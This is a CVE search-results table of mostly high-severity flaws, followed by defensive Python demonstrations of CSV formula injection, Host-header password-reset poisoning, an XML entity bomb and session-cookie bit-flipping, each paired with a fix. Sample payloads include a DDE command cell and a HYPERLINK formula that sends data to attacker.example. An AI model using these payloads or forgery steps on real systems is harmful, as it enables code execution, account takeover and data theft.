Search Results (80551 CVEs found)
| CVE | Vendor | Products | Updated | CVSS v3.1 | Description |
|---|---|---|---|---|---|
| CVE-2021-26106 | Fortinet | Fortiap, Fortiap-s, Fortiap-w2 | 2024-11-21 | 7.8 High | An improper neutralization of special elements used in an OS command (OS command injection) vulnerability in the FortiAP console, versions 6.4.1 through 6.4.5 and 6.2.4 through 6.2.5, may allow an authenticated attacker to execute unauthorized commands by running the kdbg CLI command with specifically crafted arguments. |
| CVE-2021-26104 | Fortinet | Fortianalyzer, Fortimanager, Fortiportal | 2024-11-21 | 7.8 High | Multiple OS command injection (CWE-78) vulnerabilities in the command line interface of FortiManager 6.2.7 and below, 6.4.5 and below and all versions of 6.2.x, 6.0.x and 5.6.x; FortiAnalyzer 6.2.7 and below, 6.4.5 and below and all versions of 6.2.x, 6.0.x and 5.6.x; and FortiPortal 5.2.5 and below, 5.3.5 and below and 6.0.4 and below may allow a local, authenticated, unprivileged user to execute arbitrary shell commands as root via specifically crafted CLI command parameters. |
| CVE-2021-26097 | Fortinet | Fortisandbox | 2024-11-21 | 8.8 High | An improper neutralization of special elements used in an OS command (OS command injection) vulnerability in FortiSandbox 3.2.0 through 3.2.2, 3.1.0 through 3.1.4, and 3.0.0 through 3.0.6 may allow an authenticated attacker with access to the web GUI to execute unauthorized code or commands via specifically crafted HTTP requests. |
| CVE-2021-26095 | Fortinet | Fortimail | 2024-11-21 | 7.5 High | The combination of several cryptographic issues in the session management of FortiMail 6.4.0 through 6.4.4 and 6.2.0 through 6.2.6, including the encryption construction of the session cookie, may allow a remote attacker already in possession of a cookie to reveal, alter or forge its content and thereby escalate privileges. |
| CVE-2021-26088 | Fortinet | Fortinet Single Sign-on | 2024-11-21 | 7.1 High | An improper authentication vulnerability in FSSO Collector version 5.0.295 and below may allow an unauthenticated user to bypass an FSSO firewall policy and access the protected network by sending specifically crafted UDP login notification packets. |
| CVE-2021-26070 | Atlassian | Data Center, Jira, Jira Server | 2024-11-21 | 7.2 High | Affected versions of Atlassian Jira Server and Data Center allow remote attackers to evade behind-the-firewall protection of app-linked resources via a broken authentication vulnerability in the `makeRequest` gadget resource. The affected versions are before version 8.13.3, and from version 8.14.0 before 8.14.1. |
| CVE-2021-26068 | Atlassian | Jira Server For Slack | 2024-11-21 | 8.8 High | An endpoint in the Atlassian Jira Server for Slack plugin, from version 0.0.3 before version 2.0.15, allows remote attackers to execute arbitrary code via a template injection vulnerability. |
| CVE-2021-26026 | Acdsee | Photo Studio 2021 | 2024-11-21 | 7.8 High | PlugIns\IDE_ACDStd.apl in ACDSee Professional 2021 14.0 1721 has a User Mode Write Access Violation starting at IDE_ACDStd!JPEGTransW+0x000000000000c7f4 via a crafted BMP image. |
| CVE-2021-26025 | Acdsee | Photo Studio 2021 | 2024-11-21 | 7.8 High | PlugIns\IDE_ACDStd.apl in ACDSee Professional 2021 14.0 1721 has a User Mode Write Access Violation starting at IDE_ACDStd!zlibVersion+0x0000000000004e5e via a crafted BMP image. |
| CVE-2021-25994 | Userfrosting | Userfrosting | 2024-11-21 | 8.8 High | UserFrosting versions v0.3.1 to v4.6.2 are vulnerable to Host header injection. By luring a victim application user into clicking a link, an unauthenticated attacker can use the "forgot password" functionality to reset the victim's password and take over their account. |
| CVE-2021-25962 | Shuup | Shuup | 2024-11-21 | 8 High | The Shuup application, versions 0.4.2 to 2.10.8, is affected by formula injection. A customer can inject payloads into the name field of the billing address while buying a product. When a store administrator visits the reports page, exports the data as an Excel file and opens it, the payload is executed. |
| CVE-2021-25961 | Salesagility | Suitecrm | 2024-11-21 | 8 High | The SuiteCRM application, v7.1.7 through v7.10.31 and v7.11-beta through v7.11.20, fails to invalidate password reset links associated with a deleted user ID, which makes account takeover possible for any newly created user that receives the same user ID. |
| CVE-2021-25960 | Salesagility | Suitecrm | 2024-11-21 | 8 High | SuiteCRM v7.11.18 through v7.11.19 and v7.10.29 through v7.10.31 are affected by CSV injection (formula injection). A low-privileged attacker can use the Accounts module to inject payloads into input fields. When an administrator opens the Accounts module, exports the data as a CSV file and opens it, the payload is executed. This was not fixed properly as part of CVE-2020-15301, allowing the attacker to bypass that security measure. |
| CVE-2021-25957 | Dolibarr | Dolibarr | 2024-11-21 | 8.8 High | The Dolibarr application, v2.8.1 to v13.0.2, is vulnerable to account takeover via the password reset functionality. A low-privileged attacker can reset the password of any user in the application using the password reset link received by email after requesting a forgotten-password reset. |
| CVE-2021-25951 | Xml2dict Project | Xml2dict | 2024-11-21 | 7.5 High | An XXE vulnerability in XML2Dict version 0.2.2 allows an attacker to cause a denial of service. |
| CVE-2021-25924 | Thoughtworks | Gocd | 2024-11-21 | 8.8 High | GoCD versions 19.6.0 to 21.1.0 are vulnerable to cross-site request forgery due to missing CSRF protection on the `/go/api/config/backup` endpoint. An attacker can trick a victim into clicking a malicious link that changes the backup configuration or executes system commands via the post_backup_script field. |
| CVE-2021-25923 | Open-emr | Openemr | 2024-11-21 | 8.1 High | OpenEMR versions 5.0.0 to 6.0.0.1 are vulnerable to weak password requirements because no maximum password length is enforced. If a malicious user knows the first 72 characters of the victim's password, they can use that prefix to take over the account. |
| CVE-2021-25910 | Zivautomation | 4cct-ea6-334126bf, 4cct-ea6-334126bf Firmware | 2024-11-21 | 8 High | An improper authentication vulnerability in the cookie parameter of ZIV AUTOMATION 4CCT-EA6-334126BF allows a local attacker to modify several parameters of the affected device as an authenticated user. |
| CVE-2021-25909 | Zivautomation | 4cct-ea6-334126bf, 4cct-ea6-334126bf Firmware | 2024-11-21 | 8.6 High | ZIV Automation 4CCT-EA6-334126BF firmware version 3.23.80.27.36371 allows an unauthenticated, remote attacker to cause a denial of service condition on the device by sending specific packets to port 7919. |
| CVE-2021-25908 | Fil-ocl Project | Fil-ocl | 2024-11-21 | 7.5 High | An issue was discovered in the fil-ocl crate for Rust through 2021-01-04. `From<EventList>` can lead to a double free. |
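The Shuup (CVE-2021-25962) and SuiteCRM (CVE-2021-25960) entries above describe the same bug class: a user-controlled string is written verbatim into a CSV or Excel export that an administrator later opens. The following is an added illustration, not code from either project, showing the vulnerable export pattern beside a hardened one and a small review helper that flags cells a spreadsheet would evaluate. The sample rows and field names are constructed for the example; the neutralization rule (strip the leading whitespace Excel itself skips, then prefix a single quote when the cell starts with `=`, `+`, `-` or `@`) follows the usual CSV-injection guidance.

```python
import csv
import io

# Constructed sample rows: "name" stands in for the customer-supplied billing
# name (Shuup) or account field (SuiteCRM) that ends up in an export. Only the
# second and fourth are attacks; the third is a legitimate phone number that
# happens to start with a trigger character.
SAMPLE_ROWS = [
    {"name": "Alice Example", "total": "12.50"},
    {"name": '=cmd|" /C calc"!A0', "total": "99.00"},
    {"name": "+1-555-0100", "total": "3.00"},
    {"name": '\t=HYPERLINK("http://attacker.example/?"&A1,"click")', "total": "1.00"},
]

# Leading characters that make Excel/LibreOffice treat a cell as a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@")
# Excel skips leading whitespace/control characters before looking for a
# trigger, so they must be stripped before the check or "\t=1+1" slips past.
LEADING_JUNK = " \t\r\n"


def export_vulnerable(rows):
    """Cells are written verbatim; a spreadsheet opening this evaluates them."""
    buf = io.StringIO()
    writer = csv.writer(buf)
    writer.writerow(["name", "total"])
    for row in rows:
        writer.writerow([row["name"], row["total"]])
    return buf.getvalue()


def neutralize_cell(value):
    """Return the cell as text that no spreadsheet will evaluate.

    A leading apostrophe forces text mode in Excel and LibreOffice; it is
    applied after stripping the junk Excel would itself ignore.
    """
    text = str(value)
    stripped = text.lstrip(LEADING_JUNK)
    if stripped.startswith(FORMULA_TRIGGERS):
        return "'" + stripped
    return text


def export_hardened(rows):
    """Same export with every cell neutralized and fully quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL)
    writer.writerow(["name", "total"])
    for row in rows:
        writer.writerow([neutralize_cell(row["name"]), neutralize_cell(row["total"])])
    return buf.getvalue()


def formula_cells(csv_text):
    """Review helper: list every cell a spreadsheet would treat as a formula."""
    hits = []
    for record in csv.reader(io.StringIO(csv_text)):
        for cell in record:
            if cell.lstrip(LEADING_JUNK).startswith(FORMULA_TRIGGERS):
                hits.append(cell)
    return hits


if __name__ == "__main__":
    print("vulnerable export evaluates:", formula_cells(export_vulnerable(SAMPLE_ROWS)))
    print("hardened export evaluates:", formula_cells(export_hardened(SAMPLE_ROWS)))
```

The trade-off is visible in the third row: a phone number or a negative amount also gets the apostrophe. That is the accepted cost of neutralizing on output; the alternative of rejecting such input at entry time breaks legitimate data, which is why the SuiteCRM fix referenced in CVE-2020-15301 had to be revisited.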
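The UserFrosting entry (CVE-2021-25994) is a Host header injection in the password-reset flow: the reset link in the e-mail is built from the Host header of the request that asked for it, and that request comes from the attacker. The following added example is not UserFrosting code; it simulates the flow end to end with an in-memory token store and shows the fix of building links from a configured origin, plus a Host allow-list as defence in depth. `CANONICAL_ORIGIN`, `ALLOWED_HOSTS`, the `/account/reset` path and the e-mail text are all assumptions made for the example.

```python
import secrets
from urllib.parse import parse_qs, urlsplit

# Assumed deployment configuration (example values, not from any project):
# the only origin reset links may point at, and the Hosts we serve.
CANONICAL_ORIGIN = "https://app.example.com"
ALLOWED_HOSTS = {"app.example.com"}

# Constructed in-memory token store: token -> username.
RESET_TOKENS = {}


def link_from_host_header(host_header, token):
    """Vulnerable pattern: the URL is built from whatever Host the requester
    sent. On a forgot-password request the requester is the attacker."""
    return f"https://{host_header}/account/reset?token={token}"


def link_from_config(host_header, token):
    """Hardened: the Host header plays no part in link construction."""
    return f"{CANONICAL_ORIGIN}/account/reset?token={token}"


def host_is_allowed(host_header):
    """Defence in depth: refuse requests whose Host is not one we serve.
    urlsplit normalizes the port and IPv6 brackets for us."""
    return urlsplit("//" + host_header).hostname in ALLOWED_HOSTS


def request_password_reset(username, host_header, build_link):
    """Server side of "forgot password": mint a token, store it, and return
    the e-mail body that is sent to the *victim's* address."""
    token = secrets.token_urlsafe(16)
    RESET_TOKENS[token] = username
    return f"Reset your password: {build_link(host_header, token)}"


def attacker_log(email_body, attacker_host):
    """What the attacker's web server logs if the victim clicks the link:
    the token, or None if the link never pointed at the attacker's host."""
    link = email_body.split(": ", 1)[1]
    parts = urlsplit(link)
    if parts.hostname != attacker_host:
        return None
    return parse_qs(parts.query).get("token", [None])[0]


def reset_password(token, new_password):
    """Consume the token; returns the username whose password was changed,
    or None if the token is unknown."""
    return RESET_TOKENS.pop(token, None)


if __name__ == "__main__":
    # Attacker asks for a reset of the victim's account with Host: attacker.example.
    body = request_password_reset("victim", "attacker.example", link_from_host_header)
    token = attacker_log(body, "attacker.example")
    print("vulnerable: attacker obtained token ->", reset_password(token, "owned"))
    body = request_password_reset("victim", "attacker.example", link_from_config)
    print("hardened: attacker obtained token ->", attacker_log(body, "attacker.example"))
```

The victim still has to click, which is the "luring" step in the advisory text; nothing about the link looks wrong to them because the mail genuinely came from the application.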
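The XML2Dict entry (CVE-2021-25951) is an entity-expansion denial of service in an XML-to-dict converter. The following added example is not XML2Dict's code: it is a minimal converter of the same shape built on `xml.parsers.expat`, with a constructed entity bomb kept small enough to run instantly, a measure of how much text the parser materializes per input byte, and the guard (refuse any entity declaration, never resolve external entities) that stops the bomb before it detonates. Names such as `xml_to_dict`, `UnsafeXML` and `amplification` are this example's own.

```python
import xml.parsers.expat


class UnsafeXML(ValueError):
    """Raised when a document declares entities and the caller forbade them."""


# Constructed entity-expansion document: four levels of ten-fold expansion,
# so &lol4; expands to 10,000 copies of "lol" (30,000 characters). Real
# payloads nest nine levels and expand to gigabytes; this one stays small.
BOMB = b"""<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<root><item>&lol4;</item></root>"""

BENIGN = b"<root><item>a</item><item>b</item></root>"


def xml_to_dict(data, reject_entities=False):
    """Minimal XML -> dict conversion in the spirit of an xml2dict helper.

    Returns (tree, expanded_chars). tree is nested
    {"tag", "attrs", "text", "children"} dicts; expanded_chars counts every
    character of text the parser handed back, i.e. what an entity bomb
    forces the process to allocate.
    """
    parser = xml.parsers.expat.ParserCreate()
    root = {"tag": None, "attrs": {}, "text": "", "children": []}
    stack = [root]
    counted = [0]

    def start(name, attrs):
        node = {"tag": name, "attrs": dict(attrs), "text": "", "children": []}
        stack[-1]["children"].append(node)
        stack.append(node)

    def end(name):
        stack.pop()

    def text(chunk):
        counted[0] += len(chunk)
        stack[-1]["text"] += chunk

    def entity_decl(*args):
        # Fires for every <!ENTITY ...> in the DTD, internal or external,
        # before any expansion happens, so nothing is ever blown up.
        raise UnsafeXML("entity declarations are not accepted")

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = text
    if reject_entities:
        parser.EntityDeclHandler = entity_decl
        parser.ExternalEntityRefHandler = lambda *args: 0  # never fetch externals
    parser.Parse(data, True)
    return root["children"][0], counted[0]


def amplification(data):
    """Output characters per input byte: the ratio an entity bomb maximizes."""
    _, chars = xml_to_dict(data)
    return chars / len(data)


def parses_safely(data):
    """True if the document is accepted with entity declarations forbidden."""
    try:
        xml_to_dict(data, reject_entities=True)
        return True
    except UnsafeXML:
        return False


if __name__ == "__main__":
    print("amplification of the bomb: %.0fx" % amplification(BOMB))
    print("bomb accepted with guard:", parses_safely(BOMB))
    print("benign accepted with guard:", parses_safely(BENIGN))
```

Modern expat builds also cap amplification on their own, but only once output passes a size threshold, and an application that later turns the text into Python objects still pays the cost up to that point; rejecting DTD entities outright is the cheaper and older defence for a converter that never needs them.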
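The FortiMail entry (CVE-2021-26095) describes a session cookie whose "encryption construction" lets a holder alter or forge its content. The advisory does not say which construction FortiMail used, so the following added example does not reproduce it; it demonstrates the general failure mode, encryption without integrity, with a stand-in stream cipher (HMAC-SHA256 in counter mode, standing in for AES-CTR) and then the encrypt-then-MAC form that rejects the same tampering. Keys, nonce, cookie layout (`uid=...;role=...`) and function names are all constructed for the example.

```python
import hmac
import hashlib

# Constructed demo keys and nonce; a real deployment derives these from a
# secret and uses a fresh nonce per cookie.
ENC_KEY = bytes(range(32))
MAC_KEY = bytes(range(32, 64))
NONCE = b"\x11" * 16
NONCE_LEN = 16
TAG_LEN = 32


def keystream(key, nonce, length):
    """Stand-in for AES-CTR: HMAC-SHA256 in counter mode. The attack below
    works the same way against any stream/CTR construction without a MAC."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def seal_unauthenticated(plaintext, nonce=NONCE):
    """Encryption only: confidentiality without integrity."""
    return nonce + xor(plaintext, keystream(ENC_KEY, nonce, len(plaintext)))


def open_unauthenticated(cookie):
    nonce, body = cookie[:NONCE_LEN], cookie[NONCE_LEN:]
    return xor(body, keystream(ENC_KEY, nonce, len(body)))


def seal_authenticated(plaintext, nonce=NONCE):
    """Encrypt-then-MAC: the tag covers nonce and ciphertext."""
    body = seal_unauthenticated(plaintext, nonce)
    return body + hmac.new(MAC_KEY, body, hashlib.sha256).digest()


def open_authenticated(cookie):
    body, tag = cookie[:-TAG_LEN], cookie[-TAG_LEN:]
    expected = hmac.new(MAC_KEY, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("cookie rejected: MAC mismatch")
    return open_unauthenticated(body)


def flip_field(cookie, offset, old, new):
    """Bit-flipping: with no key at all, turn a known plaintext substring at
    a known offset into a chosen one of equal length (ct ^= old ^ new)."""
    assert len(old) == len(new)
    out = bytearray(cookie)
    for i, (o, n) in enumerate(zip(old, new)):
        out[NONCE_LEN + offset + i] ^= o ^ n
    return bytes(out)


def tamper_succeeds(seal, open_, plaintext=b"uid=1042;role=user"):
    """Returns the role the server sees after the attacker rewrites
    "user" to "root", or None if the server rejected the cookie."""
    cookie = seal(plaintext)
    forged = flip_field(cookie, plaintext.index(b"user"), b"user", b"root")
    try:
        return open_(forged).split(b"role=")[1]
    except ValueError:
        return None


if __name__ == "__main__":
    print("unauthenticated cookie, role after tampering:",
          tamper_succeeds(seal_unauthenticated, open_unauthenticated))
    print("authenticated cookie, role after tampering:",
          tamper_succeeds(seal_authenticated, open_authenticated))
```

The attacker needs only their own cookie and knowledge of the field layout, which is exactly the "already in possession of a cookie" precondition in the advisory. An AEAD mode (AES-GCM, ChaCha20-Poly1305) gives the same protection as the encrypt-then-MAC form here with less room for mistakes.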